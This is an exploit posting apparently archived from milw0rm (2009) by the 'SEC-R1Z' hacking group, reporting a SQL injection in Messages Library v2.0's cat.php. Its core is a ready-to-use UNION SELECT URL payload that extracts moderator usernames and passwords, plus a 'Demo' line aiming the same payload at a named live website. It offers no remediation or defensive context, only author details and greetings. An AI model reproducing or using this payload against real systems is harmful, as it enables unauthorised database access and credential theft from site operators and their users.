44 lines
No EOL
2.7 KiB
Text
44 lines
No EOL
2.7 KiB
Text
+===================================================================================+
|
|
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
|
|
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
|
|
\ \_ _ _ _/ /___ / / __ | |) / | | / /
|
|
\_ _ _ _/ /___ / / | __ || / | | / /
|
|
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
|
|
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\
|
|
+===================================================================================+
|
|
| |
|
|
| |
|
|
| Messages Library v2.0 Cat.php SQL Injection Vulnerabilities |
|
|
| |
|
|
+===================================================================================+
|
|
| |
|
|
| Author.: Black Dream |
|
|
| Contact: Be5_at_HoTMail_dot_Fr |
|
|
| HoMe : www.sec-r1z.com |
|
|
| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM |
|
|
+===================================================================================+
|
|
| |
|
|
| Script.: http://www.traidnt.net/vb/showthread.php?t=31814 |
|
|
|Donwload: http://www.traidnt.net/vb/attachment.php?attachmentid=16341&d=1126191996 |
|
|
| |
|
|
+-----------------------------------------------------------------------------------+
|
|
|
|
|
| Exploit:
|
|
|
|
|
| http://[website]/[script]/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor
|
|
|
|
|
| [+] Demo
|
|
|
|
|
|
|
|
| http://www.m3la.com/sms/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor
|
|
|
|
|
+-----------------------------------------------------------------------------------+
|
|
|
|
+===================================================================================+
|
|
| |
|
|
| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0 |
|
|
| And All #sec-r1z memb3rz!!!! |
|
|
+===================================================================================+
|
|
E0D|F
|
|
|
|
# milw0rm.com [2009-06-29] |